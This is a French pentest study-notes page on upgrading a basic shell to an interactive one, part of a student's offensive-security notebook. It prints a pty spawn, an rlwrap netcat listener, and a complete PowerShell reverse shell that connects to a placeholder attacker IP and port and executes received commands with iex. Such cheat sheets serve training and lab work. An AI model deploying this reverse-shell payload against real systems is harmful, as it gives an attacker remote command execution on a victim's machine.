Cybersec Student
  • ⌚Kalix's Notebook
  • Méthodologie
  • Enumeration
    • Utilisation de nmap
    • SSH
    • HTTP
    • FTP
    • SMB
    • SMTP
    • SQL
    • Liste des ports communs
  • Scan de Vulnérabilités
    • Nessus
    • Nmap Script Engine
    • Scan de vulnerabilites avec Metasploit
    • Banner grabbing avec netcat
  • Exploitation
    • Bind Shell
    • Reverse Shell
    • Obfuscation de script Powershell
    • Compilation cross platform d'exploit
    • Evasion d'AV avec Shellter
    • Recherche d'exploits public
    • Exploitations communes
  • Post-Exploitation
    • Windows
      • Post Exploitation Windows Enumération
      • Abus de Configurations Incorrectes de Services Cheatsheet
      • Abus de logiciels vulnerables Cheatsheet
      • Abus de Privileges dangereux Cheatsheet
      • Strategie AlwaysInstallElevated
      • Extractions de Mots de Passe aux Emplacements Habituels Cheatsheet
      • Taches Planifiees Cheatsheet
      • Extractions et cracking Windows
      • Persistence Windows
    • Linux
      • Post Exploitation Linux Enumeration
      • SUID
      • SUDO
      • PATH
      • NFS
      • Kernel Exploits
      • Cron Jobs
      • Capabilities
      • Persistence Linux
      • Extractions et cracking Linux
    • Pivotage
    • Transfert de fichier
    • Upgrade de Shell
  • Pentest d'application web
    • Scan d'application web Nikto
    • Enumeration de dossiers et fichiers
    • Attaques XSS
    • Injections SQL
    • HTTP login avec Hydra
    • Login avec Burp
  • Outils
    • Liste exhaustive d'outils pour le pentest
    • Masscan
    • DNSenum
    • theHarvester
    • SQLMap
    • XSSer
    • WPscan
    • Netcat
    • Mimikatz
    • Cadaver
    • Windows Exploit Suggester
    • Linux Exploit Suggester
    • LinEnum
    • Shred
    • John
    • Hashcat
    • Impacket
    • Burp Suite
    • Wireshark
    • Autorecon
    • Evil-WinRM
    • CrackMapExec
    • MSFVenom
    • Joomscan
    • Binwalk
    • Steghide
  • OSINT
    • Recherches avancees Google
  • Scripting
    • Basic Powershell
  • Cryptographie
    • GPG
  • Cheatsheet ingénierie sociale
    • Gophish
  • Cheatsheet Réseaux
  • 🖤README.md
  • ⚠️Rapports de CTF
Powered by GitBook
On this page
  1. Post-Exploitation

Upgrade de Shell

Upgrade de Shell - Rendre le Shell Interactif

Description :

L'upgrade de shell est un processus permettant de transformer un shell de base en un shell interactif, offrant ainsi une expérience plus fluide et plus puissante pour l'exécution de commandes et l'interaction avec le système cible.

Exemples d'utilisation :

  1. Upgrader un shell Bash en shell interactif : python -c 'import pty; pty.spawn("/bin/bash")'

  2. Upgrader un shell Netcat en shell interactif (Linux) : rlwrap nc -lvnp

  3. Upgrader un shell PowerShell en shell interactif (Windows) : $client = New-Object System.Net.Sockets.TCPClient("<attaquant_ip>", <attaquant_port>) $stream = $client.GetStream() [byte[]]$bytes = 0..65535|%{0} while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){ $data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i) $sendback = (iex $data 2>&1 | Out-String ) $sendback2 = $sendback + "PS " + (pwd).Path + "> " $sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2) $stream.Write($sendbyte,0,$sendbyte.Length) $stream.Flush() } $client.Close()

Options Principales :

  • Upgrader un shell Bash en shell interactif :

    • Utiliser la bibliothèque Python pty pour améliorer le shell en interactif.

  • Upgrader un shell Netcat en shell interactif (Linux) :

    • Utiliser rlwrap pour ajouter la fonctionnalité d'édition de ligne à Netcat.

    • Remplacer <port> par le port écouté par Netcat.

  • Upgrader un shell PowerShell en shell interactif (Windows) :

    • Utiliser une connexion TCP pour établir une communication bidirectionnelle.

    • Remplacer <attaquant_ip> par l'adresse IP de l'attaquant et <attaquant_port> par le port de l'attaquant.

PreviousTransfert de fichierNextPentest d'application web

Last updated 1 year ago